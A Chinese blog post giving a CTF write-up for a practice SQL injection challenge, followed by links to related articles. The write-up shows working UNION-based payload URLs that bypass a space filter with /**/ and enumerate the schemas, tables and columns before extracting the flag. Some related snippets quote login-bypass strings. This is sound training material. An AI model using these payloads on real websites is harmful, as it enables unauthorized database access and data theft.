CFT每日一题之简单的SQL注入之二

最新推荐文章于 2025-10-10 15:36:25 发布
原创 最新推荐文章于 2025-10-10 15:36:25 发布 · 1k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文通过一个具体的案例展示了如何利用SQL注入漏洞获取敏感信息。从尝试性输入到逐步构造复杂查询语句,最终成功提取数据库中的flag数据。

首先,输入1 尝试一下


然后爆出ID 加 个 单引号 尝试 ,出现报错界面

然后 大概猜测代码是  select xx from XX where id=''

用and测试

发现了有过滤,经过多测实验后,发现去掉空格就可以


然后开始构造,我们可以使用/**/来代替空格

http://ctf5.shiyanbar.com/web/index_2.php?id=-1%27/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/%271%27=%271

然后就可以一层一层往下查了

http://ctf5.shiyanbar.com/web/index_2.php?id=-1%27/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/%271%27=%271


然后查询列,获得flag列

http://ctf5.shiyanbar.com/web/index_2.php?id=-1%27/**/union/**/select/**/column_name/**/from/**/information_schema.columns/**/where/**/%271%27=%271


最后查询flag列的数据

http://ctf5.shiyanbar.com/web/index_2.php?id=-11%27/**/union/**/select/**/flag/**/from/**/web1.flag/**/where/**/%271%27=%271


SQL注入SQLi-LABS(Less1-7)
网络猿的博客
01-15 1437
SQL注入SQLi-LABS(Less1-7) 往期回顾: SQLi-LABS搭建教程:SQL注入书(SQLi-LABS)搭建 文章目录SQL注入SQLi-LABS(Less1-7)一、SQL注入SQLi-LABS(一)Less-1(二)Less-2(三)Less-3(三)Less-4(三)Less-5(三)Less-6(三)Less-7 一、SQL注入SQLi-LABS (一)Less-1 1、http://127.0.0.1/sqli-labs/Less-1/?id=1’ o
靶场环境搭建-SQL注入平台
weixin_47193338的博客
02-11 1345
一、SQL注入平台介绍 Sqli-labs是一款学习SQL注入的开源平台,共有75种不同的注入类型。 二、安装步骤 1、下载链接:GitHub - Rinkish/Sqli_Edited_Version: Edited SQLi Audi lab series so that it can work in kali linux with PhpVersion 7+解压,放在www目录下 2、打开phpMyAdmin 3、登陆 4、点击数据库,新建数据库security 5、..
当爬虫工程师遇到 CTF丨2021 年 B 站 1024 安全攻防题解
K哥爬虫
10-23 1万+
文章目录第一题:加密解密第五题:APP 逆向总结 最近看到哔哩哔哩上线了一个 1024 程序员节的活动,其中有一个技术对抗赛,对抗赛又分为算法与安全答题和安全攻防挑战赛,其中安全攻防挑战赛里面有 7 个题,其中有 APP 逆向和解密的题目,作为爬虫工程师,逆向分析的技能也是必须要有的,于是 K 哥就以爬虫工程师的角度,尝试做了一下其中逆向相关的两个题,发现逆向不是很难,分享一下思路给大家。 (以爬虫工程师的角度分析安全攻防的题,网安大佬勿喷!) 1024 程序员节活动地址:https://www.bi..
SQL注入Sqli-labs注入环境搭建
u011417723的博客
03-04 1319
SQL注入Sqli-labs注入环境搭建
网络安全零基础入门必看教程:超详细的网络分析工具WireShark使用教程!
最新发布
2401_84206094的博客
10-10 786
本文介绍了网络封包分析工具WireShark的使用方法,包括软件安装、界面功能、抓包操作和过滤器设置。主要内容有:1) WireShark下载安装步骤及Win10系统兼容性处理;2) 通过ping命令演示基本抓包流程;3) 详细解析软件界面,包括数据包列表、详细信息等核心功能区域;4) 重点讲解两种过滤器使用:捕获过滤器用于抓包前设置条件,显示过滤器用于抓包后筛选数据;5) 提供TCP协议包具体内容分析示例。文章以图文结合方式,帮助读者快速掌握WireShark的基础操作和网络数据分析方法。
SQL注入SQL Injection)详解与实战
佛系摆烂
02-17 2293
SQL注入是一种通过用户输入构造恶意SQL语句,干扰后端数据库查询逻辑的攻击方式。攻击者可通过注入获取敏感数据、篡改数据库或执行系统命令。
IBM使用的CFT工具
10-08
一个IBM服务器使用的PE工具,台式机和笔记本也可以使用
【writeup】网安实验室hackinglab 注入
Oliver99877的博客
10-12 542
【题目1】 最简单SQL注入 分值: 100 最简单SQL注入 【思路】 本题未做任何防护,可以考虑在用户名处:1' or 1=1 -- 通过闭合单引号,然后注释掉后面原有的单引号来注入 密码随便填写即可 【题目2】 最简单SQL注入(熟悉注入环境) 分值: 100 最简单SQL注入 【思路】 1.index.php?id=1'...
hackinglab-注入关-第1题
u012851380的博客
11-20 965
输入用户名、密码为admin’ or ‘1’='1 flag出现
非常经典的一道SQL报错注入题目[极客大挑战 2019]HardSQL 1(两种解法!)
m0_73734159的博客
11-16 2814
(在使用语句时,如果XPath_string不符合该种类格式,就会出现格式错误,并且会以系统报错的形式提示出错误!(局限性查询字符串长度最大为32位,要突破此限制可使用right(),left(),substr()来截取字符串)没错,又是我,这群该死的黑客竟然如此厉害,所以我回去爆肝SQL注入,这次,再也没有人能拿到我的flag了。那么下面就给大家一直演示^绕过or限制了(上一个updatexml()函数使用的是()绕过空格限制)函数exp() 此函数返回e(自然对数的底)指数X的幂值的函数。
SQL注入问题
2301_81096101的博客
05-10 1205
SQL注入问题
(2020上半年第14SQL注入-注入绕过(SQL注入9/10)))小迪网络安全笔记
u013630181的博客
06-27 428
链接① 链接② 链接③ 链接④
CTF安全竞赛介绍
PICACHU+++的博客
07-01 9351
Web是CTF中最主要的题型,也是大多数人入门CTF的第一类题目,这类题目涉及常见的Web漏洞,例如:SQL注入,XSS,CSRF,文件上传、包含、下载,代码执行,反序列化等等。也有一些关于网络基础知识的考察:TCP/IP协议,数据包内容和构造等等MISC是CTF中综合性最强的一类题目,也是难度略大的一类,主要涉及隐写,流量审查,取证分析,社会工程学,数据分析与统计等包括古典密码学和现代密码学,古典密码学种类多,趣味性较强;现代密码学对数学,算法,编程能力要求高。
CTF比赛是什么?需要学哪些东西,1篇文章给你讲透彻!
logic1001的博客
09-28 9785
CTF比赛必须知道的事情
CTF中SQL注入常见题型整理
热门推荐
test
10-10 11万+
前言 正文 无过滤带回显的情况 可能使用到的工具:firefox、hackbar for firfox、sqlmap for linux 手工注入 bugku的环境 在这一环境中的主要是通过post方式传入一个参数id来查询数据库内容。 首先判断sql语句闭合方式 当在id的值后面加上'时,界面无回显,可以判断后端的sql语句应该是 select xxxx from xxxx where...
CTF/CTF练习平台 --SQL注入测试【sql宽字节注入与#,#】
Sp4rkW的博客
08-19 1万+
原题内容: http://103.238.227.13:10083/ 这题其实就是考验sql注入基本功,写个wp记录下自己的几个失误点,与大家共同学习 首先,打开页面可见 题目提示的很明显了,这是一个注入题,我们肯定得找到注入点,一般的思路都是'闭合导致注入,关键是找到什么数据被传入了数据库,才能确定注入点 按照常规思路,习惯性加上一个index.php,...
sql注入的实用应对措施
两天打鱼三天晒网
07-27 7449
关于sql注入大家可能或多或少有所了解,这篇文章介绍得很详细,大家可以看下: https://www.cnblogs.com/baizhanshi/p/6002898.html   总结了下最主要的原理就是利用sql语句中的注释漏洞-- sql = "select * from user_table where username='" & userName & "' an...
简单SQL注入原理
天跃
09-19 3万+
小白学了一点简单SQL注入,做了点笔记,感觉挺详细,希望能帮助到学习的伙伴。大佬勿喷,有不足多多的指教。 实验原理 SQL注入攻击是通过将恶意的SQL查询或添加语句插入到应用的输入参数中,再在后台SQL服务器上解析执行进行的攻击,它目前是黑客对数据库进行攻击的最常用的手段之一。本课程将带你从介绍web应用运行原理开始,一步一步理解SQL注入的由来,原理和攻击方式。 SQL注入带来的威胁主要...
SQL注入
weixin_44646187的博客
03-24 271
SQL注入(英语:SQL injection),是发生于应用程序与数据库层的安全漏洞。简而言之,是在输入的字符串之中注入SQL指令,在设计不良的程序当中忽略了字符检查,那么这些注入进去的恶意指令就会被数据库服务器误认为是正常的SQL指令而运行,因此遭到破坏或是入侵。 详细解释可参看此博文:https://segmentfault.com/a/1190000007520556 ...
sql注入 cft show web172
03-30
好的,我现在需要处理用户关于在CFT SHOW WEB172环境下预防SQL注入的问题。首先,我需要明确用户的具体需求。用户可能是在参与CTF比赛,遇到了WEB172题目,需要解决相关的SQL注入漏洞。根据用户提供的引用内容,特别...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值